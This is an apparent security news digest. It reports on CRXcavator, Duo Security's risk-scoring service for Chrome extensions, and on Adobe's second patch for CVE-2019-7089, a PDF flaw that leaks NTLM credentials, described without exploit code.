Over the past few years, hackers have increasingly abused Google Chrome extensions to steal people’s data, inject rogue ads into websites or hijack CPU power to mine cryptocurrency. Now, a new online scanning service aims to shed more light on the risks associated with browser extensions.
Called CRXcavator, from the .crx file type used by Google Chrome extensions, the service allows users or company IT staff to search extensions by their unique ID or name and review their risk score before approving their installation.
“These extensions are often overlooked when it comes to assessing the security of user endpoints, even though they have increasing access to personal and corporate data with the widespread usage of Software-as-a-Service (SaaS) tools for presentations, taxes or email clients,” the Duo Security engineers said in a blog post.
Even if an extension is not intentionally malicious, it can still contain vulnerabilities in its own code or the code of its dependencies and some of these flaws can be exploited by malicious websites or by malicious code injected into legitimate websites.
In addition, an extension that is safe today, might not be safe tomorrow. There have been cases where malicious actors have intentionally acquired extensions from their original developers then added rogue code to them. This makes the manual review of every extension by enterprise security teams a nearly impossible task.
“The set of permissions an extension requests gives a good indicator of how concerned a reviewer might need to be, so CRXcavator is built on understanding the implications of the various permissions that are available for an extension to request,” the researchers said. “We have categorized and assigned an objective numerical risk score to each permission to help a security team have a metric to use when triaging extension analysis.”
In addition to that, 94,059 extensions “do not have default-src or connect-src in the CSP defined,” the researchers said. “These are the parts of the CSP that give developers the ability to restrict which external resources the extensions can access and where the extensions can send the data they collect.”
Adobe Takes Another Stab at Patching PDF Callback Exploit
Adobe Systems has released a new update for Adobe Reader and Acrobat in less than two weeks to fix a vulnerability that allows attackers to obtain NTLM credentials by simply tricking users into opening PDF files.
The vulnerability, tracked as CVE 2019-7089, was discovered and publicly disclosed in January by researcher Alex Inführ on his blog. It consists of abusing the xml-stylesheet feature of the XML Form Architecture (XFA), an XML structure that’s used to define forms and other elements inside a PDF, in order to automatically send information to a remote SMB or WebDAV server without user interaction.
The technique can be used to steal hashed credentials for NTLMv2, the authentication mechanism used on Windows networks and is very similar to a different technique disclosed last year called BadPDF.
Adobe released a patch for this vulnerability on Patch Tuesday, Feb. 12, but shortly after, Inführ found a way to bypass the patch and notified the company. Adobe released a new patch last week to address the bypass, so companies should upgrade to the latest Reader and Acrobat versions as soon as possible.